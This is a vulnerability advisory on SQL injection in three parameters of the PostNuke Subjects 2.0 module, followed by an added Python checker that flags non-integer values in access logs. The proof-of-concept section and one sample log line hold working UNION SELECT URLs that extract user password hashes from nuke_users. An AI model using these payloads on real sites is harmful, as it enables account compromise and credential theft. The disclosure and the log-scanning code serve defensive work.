The PostNuke Subjects module 2.x is vulnerable to multiple SQL injection attacks. Detailed exploitation provided.
****************************************************************************************************
CRIOLABS
- Software: Subjects 2.0
- Type: Postnuke module
- Vendor: Postnuke Modules Factory.
****************************************************************************************************
## Software ##
Software: Subjects Postnuke module
Version: 2.0
Platforms: Unix/Win/PHP/MySQL/Postnuke
Web: https://home.postnuke.ru
## Vendor Description ##
The module is designed for structured storage and display of text content, with the option to store
the content in a file on disk. Probably the best one for converting an existing HTML-based site
to PostNuke.
## Vulnerabilities ##
SQL injection in the pageid, subid and catid variables.
## Sql-Injection ##
The variables listed above are vulnerable to SQL injection attacks.
These SQL injection vulnerabilities allow a remote user to inject arbitrary SQL commands.
/index.php?module=subjects&func=listpages&subid=[SQL]
/index.php?module=subjects&func=viewpage&pageid=[SQL]
/index.php?module=subjects&func=listcat&catid=[SQL]
## Proof of Concept ##
URLs to retrieve the MD5 password hash of a user. This PoC requires UNION support to be enabled in MySQL
to retrieve the hash.
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uname='yourname'/*
/index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/*
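As an added defender-side example that is not part of the original advisory: a small Python checker that enforces the only value the three parameters named above should ever carry (a plain decimal integer, the same rule the module should apply before building its query) and scans combined-format access-log lines for requests to the subjects module that violate it. The log lines are constructed samples; the third one carries the advisory's own PoC request.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Module functions named in the advisory and the injectable id parameter each one reads.
INJECTABLE = {"listpages": "subid", "viewpage": "pageid", "listcat": "catid"}

def is_plain_id(value):
    """The only legitimate shape for pageid/subid/catid: a non-empty run of decimal digits.
    This is the same rule the module should enforce (cast to int) before building its query."""
    return re.fullmatch(r"\d+", value) is not None

def check_request(path_and_query):
    """Return None for a clean request, or a reason string for a subjects-module request
    whose id parameter is not a plain integer (the advisory's injection points)."""
    qs = parse_qs(urlsplit(path_and_query).query, keep_blank_values=True)
    if qs.get("module", [""])[0] != "subjects":
        return None  # other modules are out of scope for this advisory
    param = INJECTABLE.get(qs.get("func", [""])[0])
    if param is None or param not in qs:
        return None
    value = qs[param][0]  # parse_qs has already URL-decoded it once, as PHP would
    if is_plain_id(value):
        return None
    return f"{param} is not an integer: {value!r}"

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def scan_access_log(lines):
    """Yield (line_number, reason) for combined-format access-log lines whose request
    hits one of the vulnerable parameters with a non-integer value."""
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if m:
            reason = check_request(m.group(1))
            if reason:
                yield n, reason

# Constructed sample log lines; line 3 carries the advisory's own PoC request,
# line 4 shows the empty-value edge case, which also breaks the unguarded query.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2005:10:00:00 +0000] "GET /index.php?module=subjects&func=listcat&catid=7 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2005:10:00:01 +0000] "GET /index.php?module=subjects&func=viewpage&pageid=12 HTTP/1.1" 200 2048',
    '10.0.0.9 - - [01/Jan/2005:10:00:02 +0000] "GET /index.php?module=subjects&func=listcat&catid=1%20UNION%20SELECT%20null,null,pn_pass,null,null,null,null,null%20FROM%20nuke_users%20WHERE%20pn_uid=2/* HTTP/1.1" 200 600',
    '10.0.0.9 - - [01/Jan/2005:10:00:03 +0000] "GET /index.php?module=subjects&func=viewpage&pageid= HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    for line_no, reason in scan_access_log(SAMPLE_LOG):
        print(f"line {line_no}: {reason}")
```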
## History ##
Vendor contacted but no response.
## Solution ##
There is no fix at this time; we recommend removing this module immediately.
## Credits ##
Criolabs staff
https://www.criolabs.net